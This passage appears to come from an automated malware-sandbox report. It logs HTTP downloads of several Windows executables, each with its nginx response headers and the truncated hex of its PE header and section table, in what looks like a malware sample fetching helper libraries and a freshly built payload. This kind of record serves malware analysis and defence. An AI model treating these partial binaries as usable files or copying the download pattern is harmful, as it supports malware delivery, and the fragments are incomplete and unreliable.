00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 18:47:28 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 18:47:29 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 18:47:30 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 18:47:31 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 18:47:31 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 18:47:32 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 18:47:40 GMTContent-Type: application/octet-streamContent-Length: 568400Last-Modified: Tue, 08 Oct 2024 18:45:00 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "67057dac-8ac50"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9e 58 fa 14 da 39 94 47 da 39 94 47 da 39 94 47 09 4b 97 46 d6 39 94 47 09 4b 91 46 76 39 94 47 09 4b 90 46 cf 39 94 47 ca bd 97 46 ce 39 94 47 ca bd 90 46 c8 39 94 47 09 4b 95 46 df 39 94 47 da 39 95 47 82 39 94 47 ca bd 91 46 94 39 94 47 92 bc 9d 46 db 39 94 47 92 bc 96 46 db 39 94 47 52 69 63 68 da 39 94 47 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ab 7d 05 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 29 00 2e 02 00 00 3e 06 00 00 00 00 00 f3 85 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 08 00 00 04 00 00 7e 7d 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 da 02 00 3c 00 00 00 00 90 08 00 d8 03 00 00 00 00 00 00 00 00 00 00 28 86 08 00 28 26 00 00 00 70 08 00 74 1c 00 00 c0 bc 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1e 2d 02 00 00 10 00 00 00 2e 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 72 a1 00 00 00 40 02 00 00 a2 00 00 00 32 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 79 05 00 00 f0 02 00 00 6a 05 00 00 d4 